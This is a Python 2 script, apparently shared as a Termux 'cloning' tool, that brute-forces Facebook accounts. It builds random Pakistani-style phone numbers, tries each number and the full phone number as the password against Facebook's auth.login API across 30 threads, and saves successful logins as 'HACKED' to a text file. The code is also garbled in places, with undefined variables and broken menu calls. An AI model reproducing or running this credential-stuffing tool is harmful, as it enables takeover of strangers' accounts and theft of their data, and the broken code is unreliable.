# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(9900):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]


def exb():
    print '[!] Exit Successfully '
    os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')

def lodhirt():
    lodhirt = [
     'AM', '   ', 'AM', '  ', 'SHOW MAN\n']
    for o in lodhirt:
        print '\r\x1b[1;94m\x1b[1;91m' + o,
        sys.stdout.flush()
        time.sleep(0.5)
def jalan(x):
	for e in x + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
def tik():
    titik = [
     '   ', '. ', '.. ', '...', '. ', '.. ', '...', '']
    for o in titik:
        print '\r\x1b[1;97m \x1b[3;91mLoad\x1b[3;92ming\033[1;0m\x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.5)
        


os.system("clear")
logo = """


"""
logo1 = """
\033[1;91m   _____    ____    __  __   _ 
\033[1;92m  / ____|  / __ \  |  \/  | (_)
\033[1;93m | (___   | |  | | | \  / |  _ 
\033[1;94m  \___ \  | |  | | | |\/| | | |
\033[1;95m  ____) | | |__| | | |  | | | |
\033[1;96m |_____/   \____/  |_|  |_| |_|
                                                    

\033[1;97m===============================================
\033[1;92m☣CREATER   :  Somi awan჻
\033[1;96m☣WHATAAP : 03455453538჻
\033[1;91m☣FACEBOOK Somi Awan჻
\033[1;95m☣WITHOUT PKG CLONING ჻
\033[1;94m☣NEW TREND AM BRAMD ჻
\033[1;97m===============================================
\033[1;93m☀NOTE Termux Data Clear EveryDay ჻
\033[1;97m===============================================
                                                             

"""
logo2 = """

\033[1;91m   _____    ____    __  __   _ 
\033[1;92m  / ____|  / __ \  |  \/  | (_)
\033[1;93m | (___   | |  | | | \  / |  _ 
\033[1;94m  \___ \  | |  | | | |\/| | | |
\033[1;95m  ____) | | |__| | | |  | | | |
\033[1;96m |_____/   \____/  |_|  |_| |_|


"""
logo3 = """                              
\033[4;37mSELECT YOUR FAVOURITE SIM CODE \033[1;0m
\033[4;41mMOBILINK/JAZZ CODE HERE\033[1;0m
\033[1;96m00, 01, 02, 03, 04,
\033[1;93m05, 06, 07, 08, 09,
\033[4;41mTELINORE CODE HERE\033[1;0m
\033[1;96m40, 41, 42, 43, 44,
\033[1;93m45, 46, 47 ,48 ,49,
\033[4;41mWARID CODE HERE\033[1;0m
\033[1;96m20, 21, 22, 23,
\033[1;93m24, ??, ??, ??,
\033[4;41mUFONE CODE HERE\033[1;0m
\033[1;96m31, 32, 33, 34,
\033[1;93m35, 36, 37, ??,
\033[4;41mZONG CODE HERE\033[1;0m
\033[1;96m10, 11, 12, 13,
\033[1;93m14, 15, 16, 17,
\033[4;41mTYPE ONLY ONE CODE \033[1;0m

"""
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
cpb = []
def menu():
    os.system('clear')
    print logo2
    print 47* '\033[1;97m⁃'
    print
    print
    print('\x1b[1;92m꧁\x1b[1;96m1\x1b[1;92m꧂\x1b[1;93m PAKISTAN BRAND  ')
    print
    print 
    jalan('       \x1b[1;91m꧁\x1b[1;93m2\x1b[1;91m꧂\x1b[1;91mYou\033[1;97mtube \x1b[1;91m꧁\x1b[1;93m3\x1b[1;91m꧂\x1b[1;92m Whats\033[1;97maap \x1b[1;91m꧁\x1b[1;93m00\x1b[1;91m꧂\x1b[1;92m E\x1b[1;93mXIT\033[1;0m')
    print
    print
    print 47* '\033[1;97m⁃'
    action()


def action():
    global cpb
    global oks
    somi = raw_input('\n\n \x1b[1;90m ►')
    if somi == '':
        print '[!] Fill in correctly'
        action()
    
    elif somi == '1':
        tik()
        os.system('clear')
        print logo2
        print logo3
        try:
            c = raw_input('►')
            k = '+91'
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            somi()                    
    elif somi =="2":                               
    	os.system('xdg-open https://youtu.be/kvo2PWGBI8I')
        somi()
        tik()
    elif Somi =="3":                                    
    	os.system('xdg-open https://chat.whatsapp.com/I4DBVT9wCPy3i9318UFu0P')
        somi()            
    elif somi == '00':            
    	exb()
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    
    print 47* '\033[1;97m⁃'
    xxx = str(len(id))
    jalan('\033[1;93m [✓] TOTAL NUMBERS  ⁞'+xxx)
    jalan('\033[1;93m [✓] PLEASE WAIT, PROCESS IS START... ')
    jalan("\033[1;93m [!] TO STOP THIS PROCESS PRESS Ctrl THEN ℤ\033[1;0m")
    print 47* '\033[1;97m⁃'
            
    def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
                okb = open('save/successfull.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = k + c + user
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
                        okb = open('save/successfull.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                       
                                                                                                                                                                                                                                                                                 
        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/login.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    print 'SOMI BRAND CODING STAR'
    print ''
    print """
    """
    
    raw_input("\n\033[1;92m[\033[1;92mEXIST\033[1;92m]")
    menu() 
          
if __name__ == '__main__':
    menu()

